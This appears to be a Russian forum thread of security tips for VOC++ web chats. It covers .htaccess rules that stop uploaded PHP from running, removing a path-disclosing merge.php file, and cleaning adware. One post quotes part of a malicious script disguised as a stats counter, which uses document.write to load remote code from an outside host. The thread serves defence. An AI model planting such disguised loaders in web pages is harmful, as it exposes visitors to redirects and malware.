ОсновноеRadiotalkПользовательское
VOC++ чаты (больше не поддерживаются)
3   •   Посмотреть все темы

Безопасность чатов VOC++ (и не только их)

 

327
Геннадий @mychatik
В чате есть папки, в которые грузятся картинки самим пользователем - это и фотографии, и вложения, и графники ( у кого в магазине есть товар "Графник")... И туда могут, под видом картинки, влить какую-нибудь каку...
Поэтому, во ВСЕ эти папки нужно добавить .htaccess следующего содержания:

Для серверов, которые работают в режимах CGI, FastCGI, suPHP, DSO (Apache).

<FilesMatch "\.([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Ph][Hh][Tt][Mm][Ll])\.?.*">
Order allow,deny
Deny from all
</FilesMatch>

Этот код запрещает прямое обращение к PHP файлам, находящимся в папках.

На серверах работающих в режиме mod_PHP (DSO - Apache PHP), где не запрещены директивы php_flag, php_value
добавляете файл .htaccess следующего содержания:

php_flag engine off
Данная строчка отключает использование PHP интерпретатора при попытке обращения к PHP файлам находящимся
в этой папке, а также находящимся во всех вложенных папках.

В итоге, даже в случае заливки в эти папки файлов со зловредным PHP кодом, они становятся для злоумышленника совершенно бесполезными, т.к. попросту не будут запускаться и выполнятся сервером.

ВАЖНО! При использовании данных директив, обратите внимание, чтобы в защищаемых таким образом папках, не было ваших PHP файлов. Иначе они также будут заблокированы для исполнения.

327
Геннадий @mychatik
В корне чата почти каждой сборки находится файл-паразит merge.php.
Зачем он там и кто, с какой целью вложил его во все сборки - неизвестно.

Marik пишет:

Казалось бы мелочь, но уязвимость таки присутствует на многих чатах, позволяя атакующему узнать абсолютный путь к скрипту на сервере и в дальнейшем использовать для каких-либо целей.
Как известно в дистрибутиве чата много лишних (мусорных) файлов, которые не используются чатом и при этом разработчик также не удосужился их удалить. Среди них файл merge.php, который находится в корне чата и присутствует в стандартном дистрибутиве чата, приходящем от разработчика.
Естественно, в большинстве чатов этот файл не удаляли. При прямом обращенни к файлу, выбивается соответствующая ошибка с раскрытием путей.

Файл самим скриптом чата нигде не используется и что именно он должен был делать - тоже сложно сказать.
Верно только одно, что ничего хорошего для чата он не принесёт, а только может помочь злоумышленнику взломать чат.
Если обратится к этому файлу, то на экране можно увидеть ошибку и полный путь, типа:

Warning: fopen(/xfs/VH/c.vbios.com/data/users.dat) [function.fopen]: failed to open stream: No such file or directory in /var/path/chat/mvoc.ru/merge.php on line 39
А это очень полезная информация для хакера 😀

Советую всем проверить на наличие и удалить этот файл. И не переживайте - он никак не взаимодействует с чатом.
Чат после его удаления будет работать, как и работал.

327
Геннадий @mychatik
Может ещё кому пригодится и поможет.

Только что ко мне обратились с просьбой найти, почему при входе в чат, при вводе логина, вылазят какие-то рекламные блоки.

Лично я никаких блоков не увидел. Но...

Сканирование индексной страницы с помощью Firebug, показало наличие скрипта непонятного счётчика.



Немного погуглив - выяснилось, что это никакой не счётчик, а вирус - мобильный редирект.
Причём он у меня почему-то выдавал ошибку 404 - поэтому я и не видел этой рекламы.

Визуально, адреса state.sml2.ru на странице не находилось. Но при просмотре подключаемых скриптов - был обнаружен левый скрипт, замаскированный под счётчик статистики topchats.
<script src="topchats/topchats.min.js"></script>
А внутри этого скрипта - и сам код:
/* Write counter URL */
document.write('<sc'+'ript type="text/ja'+'vasc'+'ript" src="http://state.sml2.ru/js/counter.js"></sc'+'ript>');function sl4cr9ch9x(o6sy90xo, fzb1gs) ... и так далее, зашифрованный код ...

Будьте внимательны со своими чатами! Не допускайте левых людей к админке и серверу.

А админу данного чата - для начала, в срочном порядке, менять пароли к серверу/FTP и удалять из файлов эту гадость.
Удалить подключение скрипта с индексной страницы и сам скрипт topchats.min.js из папки topchats в корне чата.
А может и всю эту папку. Смотря что в ней находится ещё.

327
Геннадий @mychatik
Однажды мне сбросили вот такой скриншот.



Это открывалось вместо комнаты чата, при входе с ЛЮБОГО браузера.
С телефона вход нормальный.

Это вирус на стороне пользователя.
В большинстве случаев этот паразит - программа Video and Audio plugin Ubar. Она встраивается в любую загружаемую страницу, отправляя персональные данные и выдавая кучу рекламы.

Лечение - через Uninstall Tool (или подобную) найти все программы, установленные в день возникновения проблемы. Особенно, в которых есть слово Ubar.
Удалить их с принудительной чисткой реестра.

P.S. Походу, если найдена программа (по статистике она есть почти у всех) sputnik.mail.ru - тоже удалить! По функционалу и скрытному способу установки - это тот же рекламный вирус и пользы от неё - никакой.
Также можно удалить всё, что имеет в названии mail.ru (кроме того, что вы действительно устанавливали и пользуетесь им).